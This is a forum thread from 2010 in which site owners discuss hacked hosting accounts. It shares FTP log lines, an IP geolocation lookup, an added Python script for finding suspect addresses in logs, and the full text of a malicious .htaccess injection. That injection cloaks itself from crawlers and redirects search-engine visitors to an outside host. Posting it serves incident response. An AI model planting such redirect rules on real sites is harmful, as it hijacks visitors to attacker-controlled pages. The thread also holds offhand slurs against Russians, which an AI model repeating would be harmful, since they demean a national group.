Just got this info from my host... The person that logged in and hacked the site was captured in the log file. I suggest you find out at what time the .htaccess files were changed then have your host look at the log files, see if it's the same IP address that is doing this stuff to you? Maybe we'll get lucky and the SOB is just one person doing it to multiple people. Have your host BLACKLIST any IP addresses that are doing this kind of activity. I'd also ask that you please post the IP address on here so we can compare and see if it's coming from a certain set of IP addresses that we can all blacklist.

Aug  9 06:52:59 alpha pure-ftpd: ([email protected]) [INFO] birding is now logged in 
Aug  9 06:54:16 alpha pure-ftpd: ([email protected]) [NOTICE] /home/birding//public_ftp/.htaccess downloaded  (3411 bytes, 105.30KB/sec) 
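The log comparison suggested in this post, as an added example that is not part of the original thread: it parses pure-ftpd syslog lines in the format shown above, keeps the transfers that touch a .htaccess file, and groups them by source address so an address acting on several accounts stands out. The log lines, account names and addresses (documentation ranges) are constructed.

```python
import re
from collections import defaultdict

# "<Mon> <day> <time> <server> pure-ftpd: (<user>@<ip>) [<LEVEL>] <message>"
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s(?P<server>\S+)\spure-ftpd:\s"
    r"\((?P<user>[^@\s]+)@(?P<ip>[^)\s]+)\)\s\[(?P<level>\w+)\]\s(?P<msg>.*)$"
)
# Transfer notices read "<path> uploaded  (<size>, <rate>)" or "<path> downloaded  (...)".
TRANSFER = re.compile(r"^(?P<path>.+?)\s(?P<verb>uploaded|downloaded)\s+\(")

# Constructed sample log.
SAMPLE_LOG = """\
Aug  9 06:52:59 alpha pure-ftpd: (acct_a@203.0.113.50) [INFO] acct_a is now logged in
Aug  9 06:54:16 alpha pure-ftpd: (acct_a@203.0.113.50) [NOTICE] /home/acct_a//public_ftp/.htaccess downloaded  (3411 bytes, 105.30KB/sec)
Aug  9 06:54:18 alpha pure-ftpd: (acct_a@203.0.113.50) [NOTICE] /home/acct_a//public_html/.htaccess uploaded  (3411 bytes, 98.10KB/sec)
Aug  9 07:10:02 alpha pure-ftpd: (acct_b@203.0.113.50) [NOTICE] /home/acct_b//public_html/img/.htaccess uploaded  (3411 bytes, 99.00KB/sec)
Aug  9 09:30:41 alpha pure-ftpd: (acct_a@198.51.100.7) [NOTICE] /home/acct_a//public_html/index.html uploaded  (812 bytes, 40.00KB/sec)
Aug  9 11:02:13 alpha pure-ftpd: (acct_c@192.0.2.10) [NOTICE] /home/acct_c//public_html/.htaccess uploaded  (120 bytes, 12.00KB/sec)
"""


def htaccess_events(log_text):
    """Return one record per upload or download of a file named .htaccess."""
    events = []
    for raw in log_text.splitlines():
        line = LINE.match(raw.strip())
        if not line or line["level"] != "NOTICE":
            continue
        xfer = TRANSFER.match(line["msg"])
        if xfer and xfer["path"].rsplit("/", 1)[-1] == ".htaccess":
            events.append({
                "ts": line["ts"], "ip": line["ip"], "user": line["user"],
                "verb": xfer["verb"], "path": xfer["path"],
            })
    return events


def by_source(events):
    """Group events by client address: which accounts and which paths each one touched."""
    grouped = defaultdict(lambda: {"accounts": set(), "paths": []})
    for event in events:
        grouped[event["ip"]]["accounts"].add(event["user"])
        grouped[event["ip"]]["paths"].append((event["ts"], event["verb"], event["path"]))
    return dict(grouped)


def shared_sources(events):
    """Addresses that touched .htaccess under more than one account."""
    return sorted(ip for ip, g in by_source(events).items() if len(g["accounts"]) > 1)


if __name__ == "__main__":
    found = htaccess_events(SAMPLE_LOG)
    for ip, group in by_source(found).items():
        print(ip, sorted(group["accounts"]), len(group["paths"]), "transfer(s)")
    print("seen on several accounts:", shared_sources(found))
```

Matching the timestamps in `paths` against the modification times of the .htaccess files on disk ties each changed file to a session.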

  • 0

Probably just the russian mafia, nothing to worry about :pinch:

91.212.226.131 IP address location & more:

IP address: 91.212.226.131
IP country code: RU
IP address country: Russian Federation
IP address state: Volgograd
IP address city: Zhirkov
IP address latitude: 48.6458
IP address longitude: 42.9181
ISP of this IP: Artem Zhirkov Alekseevich
Organization: Artem Zhirkov Alekseevich
Host of this IP: ip-91-212-226-131.server.lu
Local time in Russian Federation: 2010-08-10 18:25

91.212.226.131 converted to decimal and hex:

IP decimal: 1540678275
IP hex: 5bd4e283


  • 0

Hi, I have had the same file in my hosted Apache server; it was running Joomla before I removed it, but it doesn't run anything but htm files.

I removed these files a week or so ago but yesterday it returned. I have changed all access passwords to the FTP server.

I hope this does the trick.

Dreadful people those Russians. :angry:

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|****\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$   http://indanetwall.net/cgi-bin/r.cgi?p=10003&i=a7d0bde5&j=311&m=c7686090ec6b45a00edbf623e489dbf0&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo

This topic is now closed to further replies.